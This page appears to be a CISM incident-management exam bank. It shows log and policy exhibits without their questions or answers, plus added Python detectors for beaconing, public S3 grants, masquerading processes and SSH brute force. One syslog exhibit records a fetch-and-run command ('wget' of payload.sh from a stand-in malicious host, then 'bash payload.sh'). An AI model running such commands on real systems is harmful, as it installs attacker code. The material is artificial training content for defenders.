CISM Incident Management • Complete Question Bank
Complete CISM Incident Management question bank — all 0 questions with answers and detailed explanations.
Refer to the exhibit.
```
[Alert] Correlation Rule: Multiple Failed Logins
Source IP: 10.0.0.55
Destination IP: 192.168.1.10
Event Count: 150 failed logins to admin account 'jsmith' within 5 minutes
Action: Triggered
```
Refer to the exhibit.
```
# netstat -an | grep :443
tcp4  0  0  *.443              *.*                LISTEN
tcp4  0  0  192.168.1.100.443  10.0.0.1.54321     ESTABLISHED
tcp4  0  0  192.168.1.100.443  10.0.0.2.54322     ESTABLISHED
tcp4  0  0  192.168.1.100.443  203.0.113.5.44333  ESTABLISHED
```
Refer to the exhibit.
```
Policy: IncidentResponse
- Phase: Detection
  - Action: Alert security team
- Phase: Analysis
  - Action: Determine scope and impact
- Phase: Containment
  - Action: Isolate affected systems
- Phase: Eradication
  - Action: Remove malware
- Phase: Recovery
  - Action: Restore from backup
- Phase: Post-Incident
  - Action: Conduct lessons learned
```
Refer to the exhibit.
---
Incident Log:
[2025-03-20 08:15:23] ALERT: Multiple failed logins for user 'jsmith' from IP 10.0.0.45
[2025-03-20 08:16:01] ALERT: Successful login for user 'jsmith' from IP 10.0.0.45
[2025-03-20 08:20:45] ALERT: Unusual outbound connection from host 10.0.0.45 to 198.51.100.10:4444
[2025-03-20 08:22:30] ALERT: Large data transfer from host 10.0.0.45 to 198.51.100.10
---
Refer to the exhibit.
---
Incident Response Playbook: Ransomware
Phase 1: Identification - Confirm ransomware via user reports and endpoint alerts.
Phase 2: Containment - Disconnect affected systems from the network. Do not power off.
Phase 3: Eradication - Remove malware using approved tools; reimage if necessary.
Phase 4: Recovery - Restore data from clean backups; verify integrity.
Phase 5: Post-Incident - Conduct lessons learned.
---
Refer to the exhibit.
Exhibit:
Event Log Entry:
Time: 2023-10-05 14:23:17
Event ID: 4625
Source: Security
User: SYSTEM
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Failure Reason: Unknown user name or bad password.
Workstation Name: WS-001
IP Address: 192.168.1.50

Event Log Entry:
Time: 2023-10-05 14:24:05
Event ID: 4624
Source: Security
User: SYSTEM
Logon Type: 3
Account Name: jdoe
Account Domain: CORP
Workstation Name: WS-001
IP Address: 192.168.1.50

Event Log Entry:
Time: 2023-10-05 14:25:10
Event ID: 4648
Source: Security
User: jdoe
Logon Type: 2
Account Name: jdoe
Account Domain: CORP
Target Server: FILE-SRV-01
Additional Info: A logon was attempted using explicit credentials.
Workstation Name: WS-001
IP Address: 192.168.1.50
Refer to the exhibit.
Exhibit:
Firewall Log:
Date        Time      Source IP   Destination IP  Port  Protocol  Action
2023-10-05  10:00:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW
2023-10-05  10:01:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW
2023-10-05  10:02:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW
... (repeated every minute)
2023-10-05  12:00:00  10.0.0.15   203.0.113.5     443   TCP       ALLOW

IDS Alert:
Signature: ET TROJAN Win32/Malicious Beacon
Source IP: 10.0.0.15
Destination IP: 203.0.113.5
Time: 2023-10-05 10:00:00
Severity: High
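The firewall log above shows the classic beaconing shape: the same source, destination and port at a fixed interval for hours. The following is an added example, not part of the original question bank, showing how a detection rule can find that pattern on its own, without waiting for an IDS signature. It groups connections by (source, destination, port), measures the spacing between consecutive hits, and flags flows whose inter-arrival times are almost constant. The log lines are constructed to mirror the exhibit (plus an irregular flow from a second host that should not be flagged); the minimum event count and jitter threshold are assumptions.

```python
"""Beacon detection over firewall log lines.

Added example, not part of the original question bank. SAMPLE_LOG is
constructed: the 10.0.0.15 -> 203.0.113.5:443 lines follow the exhibit's
once-per-minute pattern; the 10.0.0.22 lines are deliberately irregular.
min_events and max_cv are assumed tuning values.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SAMPLE_LOG = """\
2023-10-05 10:00:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:01:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:02:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:03:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:04:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:05:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:06:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:07:00 10.0.0.15 203.0.113.5 443 TCP ALLOW
2023-10-05 10:00:12 10.0.0.22 198.51.100.7 443 TCP ALLOW
2023-10-05 10:00:31 10.0.0.22 198.51.100.7 443 TCP ALLOW
2023-10-05 10:03:58 10.0.0.22 198.51.100.7 443 TCP ALLOW
2023-10-05 10:04:02 10.0.0.22 198.51.100.7 443 TCP ALLOW
2023-10-05 10:09:40 10.0.0.22 198.51.100.7 443 TCP ALLOW
2023-10-05 10:11:05 10.0.0.22 198.51.100.7 443 TCP ALLOW
"""


def parse_line(line):
    """Split one 'Date Time Src Dst Port Proto Action' line into (ts, src, dst, port)."""
    date, time_, src, dst, port, _proto, _action = line.split()
    ts = datetime.strptime(f"{date} {time_}", "%Y-%m-%d %H:%M:%S")
    return ts, src, dst, int(port)


def find_beacons(log_text, min_events=6, max_cv=0.1):
    """Return {(src, dst, port): mean_interval_seconds} for flows that look periodic.

    A flow is periodic when it has at least min_events hits and the coefficient
    of variation (population stdev / mean) of the gaps between consecutive hits
    is at most max_cv. Real beacons add jitter, which is why a tolerance is used
    rather than requiring identical gaps.
    """
    flows = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, src, dst, port = parse_line(line)
        flows[(src, dst, port)].append(ts)

    beacons = {}
    for key, times in flows.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[key] = avg
    return beacons


if __name__ == "__main__":
    for (src, dst, port), interval in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {src} -> {dst}:{port} every {interval:.0f}s")
```

On the sample, only the 10.0.0.15 flow is reported (one hit every 60 seconds); the second host's six connections have wildly varying gaps and are ignored. In production the same statistic is usually computed per flow over a sliding window, and the interval itself (here 60 s, matching the exhibit) is what you hand to the analyst together with the destination for threat-intelligence lookup.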
Refer to the exhibit.
Exhibit: Incident Response Plan - Roles and Responsibilities:
- Incident Response Manager: Coordinates response efforts.
- Technical Lead: Performs technical analysis and containment.
- Legal Counsel: Advises on legal and regulatory obligations.
- Communications Lead: Manages internal and external communications.
- Human Resources: Handles employee-related matters if involved.
- IT Support: Provides technical assistance as needed.
Scenario: A phishing attack has compromised several user credentials. The incident response team has been activated.
Refer to the exhibit.
```
[2025-03-10 14:32:15] CRITICAL: File integrity violation on /etc/passwd
[2025-03-10 14:32:15] File: /etc/passwd, Expected hash: a1b2c3d4e5f6, Actual hash: 9z8y7x6w5v4u
[2025-03-10 14:32:16] ALERT: Unauthorized SSH key added to /home/admin/.ssh/authorized_keys
[2025-03-10 14:32:18] ALERT: New user 'backup_agent' created with UID 0
```
Matching exercise: match each concept to its description.
Develop incident response plan and train team
Identify and validate security incidents
Isolate threat, remove malware, restore operations
Conduct lessons learned and update procedures
Notify stakeholders and regulatory bodies
Matching exercise: match each concept to its description.
No restrictions; can be freely distributed
Access limited to employees; no external sharing
Access on need-to-know basis; encryption required
Highly sensitive; strict access control and logging
Subject to legal/compliance requirements (e.g., PII)
Refer to the exhibit.
Exhibit: Syslog output from a compromised server:
Mar 15 10:23:45 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
Mar 15 10:23:50 server1 sshd[1234]: Failed password for root from 10.0.0.50 port 2222 ssh2
... (repeated 100 times)
Mar 15 10:25:00 server1 kernel: nf_conntrack: table full, dropping packet.
Mar 15 10:25:02 server1 sshd[1235]: Accepted publickey for admin from 10.0.0.51 port 4444 ssh2
Mar 15 10:25:10 server1 bash: sudo: whoami
Mar 15 10:25:12 server1 bash: sudo: wget http://malicious.example.com/payload.sh
Mar 15 10:25:30 server1 bash: bash payload.sh
Refer to the exhibit.
Exhibit: Incident response plan excerpt:
Triage Priority Matrix:
- Critical (C): PII or financial data affected, regulatory implications, widespread impact
- High (H): Sensitive business data, limited user impact, potential for escalation
- Medium (M): Internal operational data, no regulatory impact, isolated systems
- Low (L): Low-value data, no sensitive information, easily restored
Refer to the exhibit.
Exhibit: JSON policy snippet for an incident response automation:
```
{
  "policy_name": "Auto-Contain Malicious IP",
  "trigger": "SIEM_alert.severity >= 5",
  "actions": [
    {"action": "block_ip", "target": "alert.source_ip"},
    {"action": "isolate_host", "target": "alert.target_host"},
    {"action": "create_ticket", "assignee": "IR_team"}
  ],
  "notify": ["SOC_manager"],
  "auto_approve": true
}
```

Refer to the exhibit.
Alert: 'Elevated number of failed logins from IP 10.0.0.5 to multiple user accounts on Domain Controller.'
Time: 2025-03-01 14:23:45
Additional details: 50 failed attempts in 30 seconds.
Refer to the exhibit.
```
[incident_response]
playbook = "playbook_standard"
priority_override = False
notification_email = "ir-team@company.com"
auto_contain = True
```
Refer to the exhibit.
[2025-04-01 08:12:33] ERROR: Firewall rule 'Allow-Internal-Web' permit tcp 10.0.0.0/8 192.168.1.0/24 port 80
[2025-04-01 08:12:34] ALERT: IDS signature 'WEB-MISC cross-site scripting attempt' from 10.5.5.5 to 192.168.1.10:80
Refer to the exhibit.
[Incident Response Plan Roles]
Role: Incident Manager - Coordinates response
Role: Technical Lead - Performs analysis
Role: Communication Lead - Handles communications
Role: Legal Counsel - Provides legal guidance
Refer to the exhibit.
[Threat Intelligence Feed]
Indicator: 203.0.113.5
Type: IP
Confidence: High
Tags: C2, Malware

[Proxy Log]
src=10.0.1.50 dst=203.0.113.5 port=443 action=ALLOWED
Refer to the exhibit.
[Incident Log Summary]
Date Range: 2024-01-01 to 2024-06-30
Total Incidents Reported: 120
Incidents with reported response time > 24 hours: 12
Incidents with no documentation: 45
Refer to the exhibit.
[2025-04-09 10:23:45] ALERT: User 'jdoe' logged in from IP 198.51.100.100 (unusual location) at 10:23:45.
[2025-04-09 10:24:10] EVENT: User 'jdoe' attempted to access /admin/config with lack of privilege.
[2025-04-09 10:25:00] EVENT: User 'jdoe' accessed /finance/customers.xlsx and downloaded 500MB.
[2025-04-09 10:25:30] ALERT: Large data transfer from internal IP to external IP 203.0.113.5.
Refer to the exhibit.
```
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::company-reports/*",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "10.0.0.0/8"
        }
      }
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::company-reports/*"
    }
  ]
}
```

Refer to the exhibit.
2025-04-09 10:30:00 192.168.1.10 -> 10.10.10.10:3306 (MySQL) - 10 connections
2025-04-09 10:30:05 192.168.1.10 -> 10.10.10.10:3306 - 20 connections
2025-04-09 10:30:10 192.168.1.10 -> 10.10.10.10:3306 - 50 connections
2025-04-09 10:30:15 192.168.1.10 -> 10.10.10.10:3306 - 100 connections
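The bucket policy above has two statements with `"Principal": "*"`. The first is narrowed by an `aws:SourceIp` condition; the second grants `s3:PutObject` to anyone with no condition at all. The following is an added example, not part of the original question bank, of a small policy audit that walks the statements and reports every wildcard-principal `Allow`, rating an unconditioned write grant as the most severe finding. The policy document is the exhibit reproduced inline; the `WRITE_PREFIXES` list and the severity labels are assumptions chosen for illustration.

```python
"""Audit an S3 bucket policy for Allow statements open to any principal.

Added example, not part of the original question bank. POLICY is the
exhibit's bucket policy; the action classification and severity labels
are assumptions for the example.
"""
import json

POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::company-reports/*",
      "Condition": {"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}}
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::company-reports/*"
    }
  ]
}
""")

# Assumed classification: any action with these prefixes changes bucket content.
WRITE_PREFIXES = ("s3:Put", "s3:Delete", "s3:Restore", "s3:Abort")


def is_public_principal(principal):
    """True for the two spellings of 'anyone': "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and principal.get("AWS") == "*"


def audit_public_statements(policy):
    """Return one finding per Allow statement whose principal is a wildcard.

    Severity (assumed scale):
      critical - write action, no Condition block (anyone can upload or delete)
      high     - read-only action, no Condition block
      info     - wildcard principal but some Condition narrows it (still worth review)
    """
    findings = []
    for idx, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not is_public_principal(stmt.get("Principal")):
            continue
        actions = stmt.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        conditioned = bool(stmt.get("Condition"))
        writes = [a for a in actions if a == "s3:*" or a.startswith(WRITE_PREFIXES)]
        if writes and not conditioned:
            severity = "critical"
        elif not conditioned:
            severity = "high"
        else:
            severity = "info"
        findings.append({
            "statement": idx,
            "actions": actions,
            "resource": stmt.get("Resource"),
            "conditioned": conditioned,
            "write": bool(writes),
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in audit_public_statements(POLICY):
        print(f"[{f['severity']}] statement {f['statement']}: {f['actions']} on {f['resource']}"
              f" (condition present: {f['conditioned']})")
```

Run against the exhibit, statement 0 is reported as `info` and statement 1 as `critical`. Two caveats when reading the `info` result: a condition only narrows the grant if it is the right condition for the path traffic takes (`aws:SourceIp` is matched against the public source address of the request, while traffic arriving through a VPC endpoint is matched with `aws:VpcSourceIp`), and a private-range value such as 10.0.0.0/8 therefore needs to be checked against how the bucket is actually reached rather than accepted at face value.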
Refer to the exhibit.
[IDS Alert]
Signature: ET TROJAN Known Botnet C2 1
Source: 10.0.1.50:443 -> Destination: 203.0.113.5:8080
Payload: [encrypted]
Refer to the exhibit.
[Windows Event Log]
Event ID 4688: A new process has been created.
Creator Subject:
  Security ID: S-1-5-21-...
  Account Name: jdoe
Process Information:
  New Process ID: 0x1a2b
  New Process Name: C:\Users\jdoe\AppData\Local\Temp\svchost.exe
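The 4688 event above is suspicious because of where the binary lives, not what it is called: `svchost.exe` is a legitimate Windows name, but the real one runs from `C:\Windows\System32`, never from a user's `Temp` directory. The following is an added example, not part of the original question bank, of a detection that parses 4688 process-creation events and flags images that borrow a system binary's name while executing outside the trusted system directories. The event text is constructed from the exhibit plus one benign event; the list of system binary names and the set of trusted directories are assumptions and would be extended in a real rule.

```python
"""Flag Event ID 4688 process creations that masquerade as Windows system binaries.

Added example, not part of the original question bank. SAMPLE_EVENTS is
constructed from the exhibit (a Temp-directory svchost.exe) plus a benign
System32 svchost.exe; SYSTEM_BINARIES and TRUSTED_DIRS are assumed lists.
"""
import re

SAMPLE_EVENTS = [
    r"""Event ID 4688: A new process has been created.
Creator Subject:
  Security ID: S-1-5-21-1000
  Account Name: jdoe
Process Information:
  New Process ID: 0x1a2b
  New Process Name: C:\Users\jdoe\AppData\Local\Temp\svchost.exe""",
    r"""Event ID 4688: A new process has been created.
Creator Subject:
  Security ID: S-1-5-18
  Account Name: SYSTEM
Process Information:
  New Process ID: 0x02f0
  New Process Name: C:\Windows\System32\svchost.exe""",
]

# Assumed: names that only ever run from the system directories.
SYSTEM_BINARIES = {
    "svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
    "winlogon.exe", "smss.exe", "wininit.exe", "explorer.exe",
}
# Assumed: directories (lower-cased, trailing backslash) where those names are legitimate.
TRUSTED_DIRS = {"c:\\windows\\", "c:\\windows\\system32\\", "c:\\windows\\syswow64\\"}

PROCESS_RE = re.compile(r"New Process Name:\s*(?P<path>.+)$", re.MULTILINE)
ACCOUNT_RE = re.compile(r"Account Name:\s*(?P<acct>\S+)", re.MULTILINE)


def parse_4688(text):
    """Pull the image path and creator account out of one 4688 event body."""
    path = PROCESS_RE.search(text)
    if not path:
        return None
    acct = ACCOUNT_RE.search(text)
    return {"path": path.group("path").strip(), "account": acct.group("acct") if acct else None}


def is_masquerading(path):
    """True when the file name is a system binary name but its directory is not trusted.

    The comparison is on the exact parent directory, so C:\\Windows\\Temp\\svchost.exe is
    still flagged even though it starts with C:\\Windows\\.
    """
    low = path.lower()
    directory, _, name = low.rpartition("\\")
    return name in SYSTEM_BINARIES and directory + "\\" not in TRUSTED_DIRS


def find_masquerades(events):
    """Return the parsed events whose image path masquerades as a system binary."""
    hits = []
    for event in events:
        parsed = parse_4688(event)
        if parsed and is_masquerading(parsed["path"]):
            hits.append(parsed)
    return hits


if __name__ == "__main__":
    for hit in find_masquerades(SAMPLE_EVENTS):
        print(f"masquerading process: {hit['path']} started by {hit['account']}")
```

Only the first event is reported. Path-based name matching is cheap and catches the case in the exhibit, but it is a first filter, not proof: the next step is to pull the file's hash and signature and compare against the known binary, and to look at the parent process that launched it, which 4688 also records when command-line and parent-process auditing are enabled.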
Refer to the exhibit.
Firewall Rule (inbound): allow tcp any any 22 (SSH) log
Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3389 (RDP) log
Firewall Rule (inbound): allow tcp any any 80 (HTTP) log
Firewall Rule (inbound): allow tcp any any 443 (HTTPS) log
Firewall Rule (inbound): allow tcp 10.0.0.0/24 any 3306 (MySQL) log
Refer to the exhibit.
Exhibit:
```
2024-11-20T15:23:45Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:47Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:49Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:51Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:53Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
```
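Two of the exhibits on this page (the server1 syslog excerpt with a hundred failed root logins followed by an accepted login, and the SRV-DB01 sshd burst just above) are the same detection problem: a burst of failures from one source, and then whether a successful login follows it. The following is an added example, not part of the original question bank, of a detector that implements both halves: it raises `brute_force` when a threshold number of failures from one IP land inside a sliding window, and `success_after_burst` when that same IP then authenticates within a grace period. The log lines are constructed in the ISO-timestamp format of the SRV-DB01 exhibit, extended with an accepted login and a benign user; the threshold, window and grace values are assumptions.

```python
"""Detect SSH brute-force bursts and a subsequent successful login from the same source.

Added example, not part of the original question bank. SAMPLE is constructed
in the SRV-DB01 exhibit's line format; the accepted root login and the
'alice' lines are added for the example. threshold/window/grace are assumed.
"""
import re
from datetime import datetime, timedelta

SAMPLE = """\
2024-11-20T15:23:45Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:47Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:49Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:51Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:23:53Z [SRV-DB01] [sshd] Failed password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:24:10Z [SRV-DB01] [sshd] Accepted password for root from 192.168.1.105 port 22 ssh2
2024-11-20T15:30:00Z [SRV-DB01] [sshd] Failed password for alice from 192.168.1.40 port 22 ssh2
2024-11-20T15:30:20Z [SRV-DB01] [sshd] Accepted publickey for alice from 192.168.1.40 port 22 ssh2
"""

# Matches both 'Failed password for <user>' and 'Accepted publickey for <user>',
# including sshd's 'invalid user <name>' form for unknown accounts.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \[\S+\] \[sshd\] (?P<result>Failed|Accepted) \S+ for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse(line):
    """Return {'ts', 'ok', 'user', 'ip'} for an sshd auth line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return {"ts": ts, "ok": m.group("result") == "Accepted", "user": m.group("user"), "ip": m.group("ip")}


def detect(log_text, threshold=5, window=timedelta(seconds=60), grace=timedelta(minutes=5)):
    """Return a list of (kind, ip, user, failure_count) findings in time order.

    kind is 'brute_force' the first time `threshold` failures from one IP fall inside
    `window`, and 'success_after_burst' for any accepted login from that IP within
    `grace` of the burst. Failures are kept in a per-IP sliding window.
    """
    events = [e for e in (parse(line) for line in log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    findings, failures, burst_at = [], {}, {}
    for e in events:
        ip = e["ip"]
        if not e["ok"]:
            recent = failures.setdefault(ip, [])
            recent.append(e["ts"])
            while recent and e["ts"] - recent[0] > window:
                recent.pop(0)
            if len(recent) >= threshold and ip not in burst_at:
                burst_at[ip] = e["ts"]
                findings.append(("brute_force", ip, e["user"], len(recent)))
        elif ip in burst_at and e["ts"] - burst_at[ip] <= grace:
            findings.append(("success_after_burst", ip, e["user"], None))
    return findings


if __name__ == "__main__":
    for kind, ip, user, count in detect(SAMPLE):
        print(f"{kind}: {ip} -> {user}" + (f" ({count} failures)" if count else ""))
```

On the sample this yields a `brute_force` finding for 192.168.1.105 against root after the fifth failure, followed by `success_after_burst` when the accepted login arrives 17 seconds later; alice's single typo is ignored. Note what the server1 exhibit shows that this rule would miss: there the accepted login came from a different address (10.0.0.51) and for a different account (admin) than the failures, so correlating only on source IP is not enough on its own and the post-login commands (the `wget` and `bash payload.sh`) are the stronger evidence.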